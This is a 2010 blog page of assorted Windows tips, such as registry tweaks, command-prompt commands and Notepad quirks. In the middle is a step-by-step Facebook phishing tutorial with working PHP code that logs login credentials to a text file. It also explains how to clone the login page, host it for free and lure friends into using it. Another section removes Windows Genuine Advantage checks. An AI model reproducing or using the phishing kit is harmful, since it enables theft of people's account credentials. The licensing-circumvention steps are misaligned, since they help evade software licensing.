Sunday, December 26, 2010

How To Remove Windows Genuine notification error

Following three simple steps now you can get rid of the buggy Windows Genuine Advantage (WGA) notifications:
You should backup up the registry , in case somethiong goes wrong.

1. Reboot Windows in safe mode (hold the f8 key while booting and you will get the option to boot in safe mode) and then:

2. Open Registry Editor (regedit.exe) and search for wgalogon folder and delete it.

3. In your windows directory search for files wga* and delete them.

You are done!Now reboot back normally and continue your work. Windows Genuine Advantage will not affect you anymore …

Enjoy your work..

How to Disable Autorun of Usb & Cd drives

This is a very commom problem sometime.Some time we need to disable autorun of usb and cd drives.To disable autorun of usb and cd drives follow following steps:

Go to run and type gpedit.msc command

You will see the Group Policy window. Then select Administrative Templates System in the tree

You will see an item in the right side pane called “Turn off Autoplay”

Double click on that item, and set the radio button to Enabled, and change the “Turn off Autoplay on” to All Drives.

Now you have disable autorun of usb and cds on your windows
If you have problem check here
http://www.howtogeek.com/howto/windows/disable-autoplay-of-audio-cds-and-usb-drives/

Task Manager Disabled by Administrator

This is a very big problem problem which many people face when they are caught by any virus or worms.You can enable your task manager by following ways

Method 1: Change Task Manager through a Registry REG file

1.Click on Start, Run, and type Notepad and press Enter

2.Copy and paste the information between the dotted lines into Notepad and save it to your desktop as taskmanagerenable.reg

[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem]
“DisableTaskMgr”=dword:00000000

3. Double click on the taskmanager.reg file to edit the Windows registry

Method 2

1.Click on Start, Run, and type REGEDIT and press Enter

2.Navigate to the following branch tree

HKEY_CURRENT_USER Software Microsoft Windows CurrentVersion Policies System

3.In the right pane,if find the value named DisableTaskMgr delete it

If these method does not enable task manager on your system then try following link

http://www.pchell.com/support/taskmanagerdisabled.shtml

Command Prompt Tricks Tips & Hacks

There are lot of command prompt tricks and tips which many of us don’t know about.Command prompt can be very useful if you know how to use.Just go to cmd and check the following cool commands

1. systeminfo

With this command, you can retrieve the following information:

Host Name
OS Name
OS Version
OS Manufacturer
OS Configuration
OS Build Type
Registered Owner etc

2. driverquery

Get Installed Driver Information

3. ipconfig /all

information about your network connection and IP address


4. subst W: C:windows

Map A Drive Letter to a Folder

5. tasklist

List All Tasks Running On The Computer

6.taskkill /im programnames.exe /f

to Kill A Program

How to write Indian Currency Symbol from Keyboard

The Indian Rupee symbol is on our way.But now we cannot directly type it from our keyboard .There is a font in foradian blog to help you hit the key left to number 1 and see the symbol on your screen. Download this .ttf file and copy it

Download this font Download this Font file and copy it to the following location

C:WINDOWSFonts

Now open note pad change font name to Rupee Foradian

and press key left to Number 1

Done now you can see the Indian Rupee symbol

How to Control move Mouse Pointer from Keyboard

You can try this method if you are bore of using your mouse in normal way.You can control your mouse pointer with keyboard keys in all windows . When your mouse stops working, you can enable this keyboard feature to complete your important work. This keyboard mouse can perform all tasks which are same as of normal mouse.

Follow the given steps to activate the keyboard mouse:

1. log into your computer with administrative rights.

2. To activate this feature, press left Alt+left Shift+NumLock keys at once and you will receive a small MouseKey box.

3. To keep MouseKeys on, click on Ok button or click on cancel button to cancel MouseKeys box.

4. Click on Settings button, if you want to adjust the mouse cursor detail settings.

5. A new dialog box will appear with “Settings for MouseKeys”, now you can do all mouse settings ,for example mouse cursor speed, acceleration and some other features.

6. Now using Numeric keypad, you can move your mouse pointer where you want to move on desktop

The controls are:


1,2,3,4,6,7,8 and 9 keys are used to move the mouse cursor into different directions on desktop
Key 5 is used as mouse click button.
Insert key used to hold down mouse button.
+ Sign used to double click on any object.
Delete button used to release the mouse.

You can disable this feature by Click on NumLock button
Enjoy this feature

Saturday, December 4, 2010

USE GOOGLE AS CALCULATOR:GOOGLE CALCULATOR



How to use the Google calculator?

Many time when we are online we need to some mathematical calculation,you can do this by using google calculator easily .

Google-Calculator

Google-Calculator

Google’s calculator tries to understand the problem you are attempting to solve without requiring you to use special syntax. However, it may be helpful to know the most direct way to pose a question to get the best results. Listed below are a few suggestions for the most common type of expressions (and a few more esoteric ones).

Most operators come between the two numbers they combine, such as the plus sign in the expression 1+1.

OperatorFunctionExample
+addition3+44
-subtraction13-5
*multiplication7*8
/division12/3
^exponentiation (raise to a power of)8^2
%modulo (finds the remainder after division)8%7
chooseX choose Y determines the number of ways of choosing a set of Y elements from a set of X elements18 choose 4
th root ofcalculates the nth root of a number5th root of 32
% ofX % of Y computes X percent of Y20% of 150

Some operators work on only one number and should come before that number. In these cases, it often helps to put the number in parentheses.

OperatorFunctionExample
sqrtsquare rootsqrt(9)
sin, cos, etc.trigonometric functions (numbers are assumed to be radians)sin(pi/3)
tan(45 degrees)
lnlogarithm base eln(17)
loglogarithm base 10log(1,000)


A few operators come after the number.

OperatorFunctionExample
!factorial5!

For more information check here

http://www.google.co.in/help/calculator.html


AMAZING FACEBOOK TRICK

While surfing on the net I found and amazing facebook account trickGo to your facebook account click on home Now do following
On your keyboard, press…

  1. 1.UP 2 times
  2. 2.DOWN 2 times
  3. 3.LEFT
  4. 4.RIGHT
  5. 5.LEFT
  6. 5.RIGHT
  7. 6.B
  8. 7.A
  9. 8. Enter

  10. and then scroll up or down…
you will see shining circles on Facebook with a diamond ring effect!
remember press the keys in correct order…

How to hack facebook Account password

We will we use very popular method to hack facebook account password.That is Phishing.This is one of the best method to hack facebook account password.This will work only if your friend don’t know about this method of hacking facebookFor this We need three files:

1.Fake facebook login page
2.Php file
3.Text file to store password

Create your php file

1.Open notepad and copy this code:

header (‘Location: https://login.facebook.com/login.php’);
$handle = fopen(“password.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($ handle, “rn”);
fclose($handle) ;
exit;
?>

2.Now save this as phishing.php
Your php file is now created
If you Don’t understand what this php file is doing you need to learn some basic of php.This php file will save information of victim in file password.txt

Create facebook fake login page

Now go to http://www.facebook.com and right click / View Source.Copy source in notepad and save it as facebooklogin .html .Now open source code of this html file
We need to find the place where Login code in facebook page that where send the user after clicking on it.
Now Press crtl-f after opening source code and search for this code

action=anything.
In this case we have this

action=”https://login.facebook.com/login.php?

We replace that part with:

action=”phishing.php

Save your facebooklogin.html file

Text file

Create a blank text file and name it password.txt

Now upload all the three files Facebooklogin.html,phishing.php,Password.txt in any free web hosting site directory like 100mb.com and now you can just check your fake facebook login page by going tohttp://yoursite.110mb.com/Facebooklogin.html for the fake login page.Just type some random user name and any password into the text box and then you will see in your file manager that a file called “Password.txt” is created,In which the password is stored.
You can use

http://www.justfree.com/

http://www.ripway.com/

also or any other free hosting site.

Suppose you register with name facebookhack.Your link will behttp://www.facebookhack.justfree.com/
After uploading files your phishing link will behttp://www.facebookhack.justfree.com/facebooklogin.html
Send this link to your friend if they login there their password will be save at the server .
You can trick your friend to login this fake facebook page by saying its new version of facebook check it out,or in any way you like

“Use this on your own responsibility for educational purpose only

How to Access Banned Facebook in Pakistan

Facebook is now banned in Pakistan.But there method to access blocked facebook in pakistan.One method to access facebook is to use proxy sites.There are many free proxy site online ,Which enable you to access blocked website from any where.Its sad for facebook lovers in pakistan.
Use free proxy to surf anonymously online. Proxy can change to change your IP address, secure your internet connection, hide your internet history and protect your privacy online for free.
Some of free proxy on web are below

http://www.hidemyass.com/

http://secureproxies.info

http://homeproxies.info


http://proxys4school.info

http://sweetwind.cz.cc/

There are lot of free proxy site.You can search google for How to view blocked facebook in pakistan ,Free working proxy ,unblocked facebook etc to get more proxy websites.You can share your own proxy website here .

18 Impressive Computer Shortcuts and tricks


Don’t just be basic user. Explore the 18 impressive windows tricks below. Be an advance computer user. Here are some simple tricks and pranks which are good enough to impress someone.

1. Set Processes Priority

Follow this tip to increase the priority of active processes, this will result in prioritization of processes using the CPU.
CTRL-SHIFT-ESC1.Go to the second tab called Processes, right click on one of the active processes, you will see the Set Priority option
2.For example, your Run your CD writer program , set the priority higher, and guess what, no crashed CD’s

2. Shutdown Trick !

Immediate rapid shut down window while shutting down window. open task manager(Ctr+Alt+Del),
Select shut down tab. and press ‘ Ctrl ‘ key while select Turn Off from dis tab.
Count 5 4 3 2 1 Voila!!! U r window will rapidly shut down.
Speed Up Ur Shut down !!
Start Regedit.
Navigate to HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control.
Click on the “Control” Folder.
Select “WaitToKillServiceTimeout”
Right click on it and select Modify.
Set it a value lower than 2000 (Mine is set to 200).
Like previous versions of windows, it takes long time to restart or shutdown windows xp when the “Exit Windows” sound is enabled. to solve this problem you
must disable this useless sound. click start button then go to settings -> control panel -> Sound,Speech and Audio devices -> Sounds and Audio Devices -> Sounds, then under program events and windows menu click on “Exit Windows” sub-menu and highlight it.now from sounds you can select,choose “none” and then click apply and ok. now you can see some improvements when shutting down your system.

3. Hide your folders.. never known trick !!!!!!!!!!Disguise them to “Recycle Bin”

Rename any folder with extension {645FF040-5081-101B-9F08-00AA002F954E}
eg,
if u’ve a folder games
press F2,
then type, “games.{645FF040-5081-101B-9F08-00AA002F954E}”
c the magic….
then 2 get to original form,
remove the extension using
“ren games.{645FF040-5081-101B-9F08-00AA002F954E} games” in dos or as a bat file
Now you are ready to roll!

4. System information

system up time only for xp professional editionIt boasts how long it can stay up. Whereas previous
versions of Windows were coy about how long they went
between boots, XP is positively proud of its stamina.
Go to the Command Prompt in the Accessories menu from
the All Programs start button option, and then type
‘systeminfo’. The computer will produce a lot of
useful info, including the uptime. If you want to keep
these, type ‘systeminfo > info.txt’. This creates a
file called info.txt you can look at later with
Notepad. (Professional Edition only).

5. lock PC just by double clicking mouse

You can lock your XP workstation with two clicks of
the mouse. Create a new shortcut on your desktop using
a right mouse click, and enter ‘rundll32.exe
user32.dll,LockWorkStation’ in the location field.
Give the shortcut a name you like. That’s it — just
double click on it and your computer will be locked.
And if that’s not easy enough, Windows key + L will do
the same.

6. SPEED UP UR ACROBAT READER (ALMOST LIKE NOTEPAD)

Do u get irritated when acrobat reader takes 5/10 seconds to load when you want to open a pdf document. There is a way to speed up the loading.
1. Go to the installation folder of acrobat reader
(C:program filesadobeacrobatreader.. whatever)
2. Move all the files and folders from the “plugins” directory to the “Optional” directory. (I repeat.. cut and paste the files NOT copy & paste).
Also make sure that acrobat reader is not open else it will lock the files and not allow you to move the files).
Now your acrobat reader will load very fast
and almost as good as notepad..

7. Remove Stored username and Passwords !

To remove the Stored User Names and Passwords from your system, try this:
Click Start, Run and type Control keymgr.dll
Remove the entries from the list.
The other ways to access this dialog are:
Type Control Userpasswords2 in RUN box, click Advanced, Manage Passwords
-or-
From Control Panel, select your User Account, click Manage your network passwords
It Works

8. Remove the Username and picture from Windows XP New Start Menu

The User account picture can be removed by turning off the Welcome Screen. Or, by switching to Windows Classic theme. Follow the method described in this article if you want to remove the username and picture from the Start Menu, without disabling the Welcome Screen and Windows XP Theme.
For those who want to remove the user name and user account picture from Start Menu, in order to have a blank blue panel at the top, try this:
Start Windows Explorer and go to this folder:
C:Documents and SettingsAll UsersApplication DataMicrosoftUser Account Pictures
From that folder, rename the BMP file which corresponds to your user account.
( For example, if your username is Robert, rename Robert.bmp to old_Robert.bmp )
Next, rename the following folder:
C:Documents and SettingsAll UsersApplication DataMicrosoftUser Account PicturesDefault Pictures
to something else, say…
C:Documents and SettingsAll UsersApplication DataMicrosoftUser Account PicturesNo_Default Pictures
To remove the user name, follow these steps
Start regedit.exe and navigate to the this key:
HKEY_CURRENT_USER Software Microsoft Windows CurrentVersion Policies Explorer
In the right-pane, set NoUserNameInStartMenu value-data to 1
Close Regedit.exe and restart Windows.
You’ll end up with a blue space at the top of the Start Menu.

9. To get back the username and the picture, reverse the above procedure.

For the New Start Menu, Windows XP looks for the .bmp file in the folder
C:Documents and SettingsAll UsersApplication DataMicrosoftUser Account Pictures
If the file is not found, it takes a picture from the “Default Pictures” sub-folder. By renaming the .bmp and the “Default Pictures” folder, you’re giving no chance for Windows to fetch an image for the Start Menu

10. Notepad Tricks.

Well quite old but here is d complete collection
Step 1: Open Notepad
Step 2: Write following line in the notepad.
this app can break
Step 3: Save this file as xxx.txt
Step 4: Close the notepad.
Step 5: Open the file again.
or
1> Open Notepad
2> Enter four words separated by spaces, wherein the first word has 4 letters, the next two have three letters, and the last word has five letters
3> DON’T hit enter at the end of the line.
4> Save the file.
5> Close Notepad.
6> Reopen Notepad.
7> Open the file you just saved.
or
Open a note pad
type Bush hid the facts
save that file,
close it
again open and see…

11. NOTEPAD “world trade centre trick”.. :Rahul

Did you know that the flight number of the plane that had hit WTC …on
9/11 was Q33N ….Open your Notepad in ur computer and type the flight
number i.e Q33N… Increase the Font Size to 72, Change the Font to
Wingdings. U will be amazed by the findings.

12. log trick !! make ur Notepad a diary !!

Sometimes we want to insert current data and time, whenever we open the file in the notepad. If you are a lazy person like me, who don’t like to press F5 whenever you open a notepad. Then here is a trick to avoid this. Just add a .LOG in the first line of your text file and close it.
Whenever you open the file with that text in the first line in the notepad, it will insert the current date and time at the end of the file. You can start entering your text after that.

WHY?

The reason this happens:
In notepad, any other 4-3-3-5 letter word combo will have the same results.
It is all to do with a limitation in Windows. Text files containing Unicode UTF-16-encoded Unicode are supposed to start with a “Byte-Order Mark” (BOM), which is a two-byte flag that tells a reader how the following UTF-16 data is encoded.
1) You are saving to 8-bit Extended ASCII (Look at the Save As / Encoding format)
2) You are reading from 16-bit UNICODE (You guessed it, look at the Save As / Encoding format)
This is why the 18 8-bit characters are being displayed as 9 (obviously not supported by your codepage) 16-bit UNICODE characters

13. SPEED UP MENU DISPLAY.!!

When using the start menu the you will notice a delay between different tiers of the menu hierarchy. For the fastest computer experience possible I recommend changing this value to zero. This will allow the different tiers to appear instantly.
Start Regedit. If you are unfamiliar with regedit please refer to our FAQ on how to get started.
Navigate to HKEY_CURRENT_USERControl PanelDesktop
Select MenuShowDelay from the list on the right.
Right on it and select Modify.
Change the value to 0.
Reboot your computer.

14. CLICKING * .AVI FILES ON EXPLORER CAUSING 100% CPU USAGE.!!

Well windows seem to have a REALLY big problem when it comes to reading AVI files. It seems that when you click on an AVI file in explorer, it’ll try to read the entire AVI file to determine the width,height, etc. of the AVI file (this is displayed in the Properties window). Now the problem with Windows is that if you have a broken/not fully downloaded AVI file that doesnt contain this info, Windows will scan the entire AVI file trying to figure out all these properties which in the process will probably cause 100% CPU usage and heavy memory usage. To solve this problem all you have to do is the following:
1. Open up regedit
2. Goto HKEY_CLASSES_ROOTSystemFileAssociations.avishellexPropertyHandler
3. Delete the “Default” value which should be “{87D62D94-71B3-4b9a-9489-5FE6850DC73E}”
Voila! Please not that this will no longer provide you with the windows properties displaying the AVI file information such as width, height, bitrate etc. But its a small price to pay for saving you resources.
NOTE: Please use caution when using regedit. Improper usage may cause windows to behave imcorrectly. Also, I cannot be held resposible. Backup your registry first.

CD ROM STOPS AUTOPLAYING/AUTORUN.!!

And the AutoPlay Tab has disappeared in My Computer, Devices With Removable Storage, Right Click on CDROM, Properties.
Solution: The service: “Shell Hardware Detection” has been set to Manual or Disabled. Go to Control Panel, Administrative Tools, Services. Return this service to “Automatic”.

15. How to make your Desktop Icons Transparent

Go to Control Panel > System, > Advanced > Performance area > Settings button Visual Effects tab “Use drop shadows for icon labels on the Desktop”

16. DISPLAY MESSAGE ON STARTUP.

Start regedit, if you are unfamiliar with regedit please see our FAQ.
Navigate to HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon
Modify the key legalnoticecaption with what you want to name the window.
Modify the key legalnoticetext with what you want the window to say. Restart

17. AUTO DELETE TEMPORARY FOLDER.!!

ll what i prefer is %temp% ” without quotes.. at Start -> Run..
this opens ur temp folder n den u cal erase it neatly// still try dis one too..
First go into gpedit.msc
Next select -> Computer Configuration/Administrative Templates/Windows Components/Terminal Services/Temporary Folder
Then right click “Do Not Delete Temp Folder Upon Exit”
Go to properties and hit disable. Now next time Windows puts a temp file in that folder it will automatically delete it when its done! Note from Forum Admin: Remember, GPEDIT (Group Policy Editor) is only available in XP Pro.

18. Make your PDF files to speak (Auto prompt)

make ur pdf files to speak
here r the shortcuts for hearing pdf files in abobe reader 6.0 or higherctrl+shift+b —->to hear the whole topic
ctrl+shift+v —->to hear the page
Have fun!